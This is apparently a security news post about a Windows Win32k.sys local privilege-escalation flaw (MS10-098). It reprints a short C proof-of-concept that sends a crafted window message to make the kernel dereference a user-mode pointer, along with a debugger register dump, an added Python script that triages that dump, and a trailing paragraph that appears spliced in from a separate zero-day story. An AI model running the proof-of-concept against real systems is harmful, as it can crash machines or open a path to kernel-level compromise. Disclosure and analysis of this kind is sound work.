April 20, 2014

Microsoft Windows Win32k.sys Local Privilege Escalation Vulnerability

A security researcher at SYSDREAM has discovered a local privilege-escalation vulnerability in Microsoft Windows, located in the ‘Win32k.sys’ kernel-mode driver.

A local attacker can exploit this vulnerability to execute arbitrary code with kernel-level privileges. According to SecurityFocus.com, successful exploits result in the complete compromise of affected computers, and failed exploit attempts may cause a denial-of-service condition.

Exploit Code:

/*
* MS10-098
* CVE-2010-3944
* Microsoft Windows Win32k pointer dereferencement
* --------------------
* Affected Software
* ------------------------
* Microsoft Windows 7 / 2008
* --------------------
* Consequences
* -----------------------
* An unprivileged user may be able to cause a bugcheck, or possibly execute
* arbitrary code by CSRSS.EXE.
* Credits : Stefan LE BERRE (s.leberre@sysdream.com)
*           Ludo t0ka7a
* WebSites : http://www.sysdream.com/
*            http://ghostsinthestack.org/
*            http://infond.blogspot.com/
*            http://twitter.com/hackinparis
* kd> r
* eax=00013370 ebx=0000000d ecx=00000000 edx=fea0069c esi=fea00618 edi=fea00618
* eip=8d72af90 esp=95b54a98 ebp=95b54b00 iopl=0         nv up ei ng nz na pe nc
* cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010286
* win32k!xxxRealDefWindowProc+0xf6:
* 8d72af90 c60000          mov     byte ptr [eax],0           ds:0023:00013370=??
*/

#include <stdio.h>
#include <windows.h>
#include <Winuser.h>

int main(int argc, char *argv[])
{
    SendMessage((HWND) 16,(UINT) 13,0x80000000,0x00013370); // 0x13370 is the deref and 16 is the window handle of #32769
    return 0;
}
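
Reading the register dump in the PoC header from the defender's side (an added example, not part of the original post or the SYSDREAM code): the script below parses the `kd> r` output and flags a ring-0 instruction that writes through a user-mode address, which is what the dump shows for win32k. The 0x80000000 user/kernel boundary assumes 32-bit Windows with the default address split, and the names `triage`, `KD_DUMP` and `GPRS` are illustrative.

```python
import re

# Register dump copied from the PoC header on this page ("* " prefixes stripped).
KD_DUMP = """\
eax=00013370 ebx=0000000d ecx=00000000 edx=fea0069c esi=fea00618 edi=fea00618
eip=8d72af90 esp=95b54a98 ebp=95b54b00 iopl=0         nv up ei ng nz na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010286
win32k!xxxRealDefWindowProc+0xf6:
8d72af90 c60000          mov     byte ptr [eax],0           ds:0023:00013370=??
"""

# Assumption: 32-bit Windows with the default 2 GB user / 2 GB kernel split.
KERNEL_BASE = 0x80000000
GPRS = ("eax", "ebx", "ecx", "edx", "esi", "edi")

REG = re.compile(r"\b([a-z]{2,3})=([0-9a-f]+)\b")
SYM = re.compile(r"^(\S+!\S+?)\+0x[0-9a-f]+:$", re.M)
INSN = re.compile(
    r"^[0-9a-f]{8}\s+[0-9a-f]+\s+(\w+)\s+(.+?)\s+"
    r"\w\w:[0-9a-f]{4}:([0-9a-f]{8})=(\S+)$", re.M)

def triage(dump):
    """Classify a kd fault: where it happened, what it touched, which register fed it."""
    regs = {name: int(val, 16) for name, val in REG.findall(dump)}
    sym = SYM.search(dump)
    insn = INSN.search(dump)
    if not (insn and "eip" in regs and "cs" in regs):
        raise ValueError("not a recognisable 'kd> r' dump")
    mnemonic, operands, ea, content = insn.groups()
    target = int(ea, 16)
    result = {
        "symbol": sym.group(1) if sym else None,
        "ring0": (regs["cs"] & 3) == 0 and regs["eip"] >= KERNEL_BASE,
        # Only the mov-to-memory form seen in this dump is recognised.
        "memory_write": mnemonic == "mov" and "[" in operands.split(",")[0],
        "target": target,
        "target_in_user_space": target < KERNEL_BASE,
        "target_unmapped": content == "??",  # kd prints ?? for unreadable memory
        "pointer_regs": sorted(r for r in GPRS if regs.get(r) == target),
    }
    # Kernel code storing through an address from the user half of the address space.
    result["user_pointer_write"] = all(
        result[k] for k in ("ring0", "memory_write", "target_in_user_space"))
    return result

if __name__ == "__main__":
    for key, value in triage(KD_DUMP).items():
        print(f"{key:22} {value:#x}" if key == "target" else f"{key:22} {value}")
```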

The vendor has released an advisory and updates:

Another zero-day vulnerability in the Windows kernel

Prevx is reporting that an exploit for a previously unknown security vulnerability in Windows’ win32k.sys kernel mode driver has been published on a Chinese forum. The vulnerability allows attackers who have penetrated a system to escalate their privileges.
